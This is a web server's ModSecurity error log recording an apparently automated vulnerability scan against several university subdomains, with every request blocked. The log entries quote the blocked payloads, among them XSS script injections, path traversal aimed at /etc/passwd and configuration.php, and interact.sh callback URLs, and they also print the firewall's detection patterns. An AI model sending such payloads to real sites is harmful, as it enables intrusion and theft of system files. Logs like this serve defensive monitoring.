[Tue Aug 29 11:51:12.809732 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAm91mIAAAAG"]
[Tue Aug 29 11:51:12.813496 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAhhc0AAAAAd"]
[Tue Aug 29 11:51:12.820465 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15QMCo-f0AAAmIbPcAAAAo"]
[Tue Aug 29 11:51:12.852680 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAm91mMAAAAG"]
[Tue Aug 29 11:51:13.548134 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAm91mQAAAAG"]
[Tue Aug 29 11:51:13.555136 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAm5BwgAAAAA"]
[Tue Aug 29 11:51:13.556732 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAkyyDkAAAAW"]
[Tue Aug 29 11:51:13.579731 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAnCKx4AAAAK"]
[Tue Aug 29 11:51:13.585257 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAmQ-wMAAAAb"]
[Tue Aug 29 11:51:13.585996 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAnGkHwAAAAR"]
[Tue Aug 29 11:51:13.586779 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAnEqTgAAAAO"]
[Tue Aug 29 11:51:13.627241 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAjdQTIAAAAZ"]
[Tue Aug 29 11:51:13.628545 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAknEN4AAAAB"]
[Tue Aug 29 11:51:13.659718 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAmNp2gAAAAQ"]
[Tue Aug 29 11:51:13.677191 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAnGkH0AAAAR"]
[Tue Aug 29 11:51:13.680944 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAfWODgAAAAL"]
[Tue Aug 29 11:51:13.682760 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAm91mcAAAAG"]
[Tue Aug 29 11:51:13.723404 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAmNp2kAAAAQ"]
[Tue Aug 29 11:51:14.550123 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QsCo-f0AAAm5BwoAAAAA"]
[Tue Aug 29 11:51:14.684593 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAm@5wYAAAAH"]
[Tue Aug 29 11:51:14.687182 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAm7m84AAAAE"]
[Tue Aug 29 11:51:14.687807 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAnMeoIAAAAD"]
[Tue Aug 29 11:51:14.751262 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAhhc0cAAAAd"]
[Tue Aug 29 11:51:14.759430 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAnIlfEAAAAV"]
[Tue Aug 29 11:51:15.625739 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAhhc0kAAAAd"]
[Tue Aug 29 11:51:15.627700 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15Q8Co-f0AAAnCKyUAAAAK"]
[Tue Aug 29 11:51:15.667534 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAnMeoUAAAAD"]
[Tue Aug 29 11:51:15.668705 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAl4sXkAAAAf"]
[Tue Aug 29 11:51:15.671087 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAkr0EQAAAAC"]
[Tue Aug 29 11:51:15.671691 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAnB5UYAAAAJ"]
[Tue Aug 29 11:51:15.728318 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAnCKycAAAAK"]
[Tue Aug 29 11:51:15.755738 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAkyyEEAAAAW"]
[Tue Aug 29 11:51:15.756664 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAm5BxEAAAAA"]
